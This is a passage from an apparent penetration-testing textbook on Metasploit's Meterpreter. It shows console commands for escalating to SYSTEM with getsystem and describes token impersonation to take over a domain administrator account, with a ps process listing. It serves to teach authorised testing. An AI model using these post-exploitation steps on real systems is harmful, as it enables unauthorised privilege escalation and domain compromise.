background image

Meterpreter

87

meterpreter > 

use priv

Loading extension priv...success.
meterpreter > 

getsystem

...got system (via technique 4).
meterpreter > 

getuid

Server username: NT AUTHORITY\SYSTEM

To switch back to the previous user account where we initially got our 

Meterpreter shell, we’d use 

rev2self

.

Token Impersonation

In 

token impersonation

, we grab a Kerberos token on the target’s machine and 

then use it in place of authentication to assume the identity of the user that 
originally created that token. Token impersonation is very beneficial for pen-
etration tests and can be one of Meterpreter’s most powerful features.

Consider the following scenario, for example: You’re performing a pene-

tration test at your organization, and you successfully compromise the system 
and establish a Meterpreter console. A domain administrator account has 
logged on within the last 13 hours. When this account logs on, a Kerberos 
token is passed to the server (single sign-on) and is valid for a certain period 
of time. You exploit this system via the valid and active Kerberos token, and 
through Meterpreter you successfully assume the role of a domain adminis-
trator, without needing the password. Then you hack a domain administra-
tor account or go after a domain controller. This is probably one of the 
easiest ways to gain access into a system and just another example of why 
Meterpreter is so useful.

Using ps

For this example, we’ll use the Meterpreter function 

ps

 to list the applications 

running and show under which account they are running. We’ll use the 
domain name 

SNEAKS.IN

   and the user account 

ihazdomainadmin 

.

meterpreter > 

ps

Process list
============

 PID   Name                 Arch  Session  User                          Path
 ---   ----                 ----  -------  ----                          ----
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\SYSTEM
380    cmd.exe              x86   0 

SNEAKS.IN\ihazdomainadmin

\System\

Root\System32\cmd.exe

. . . SNIP . . .

meterpreter >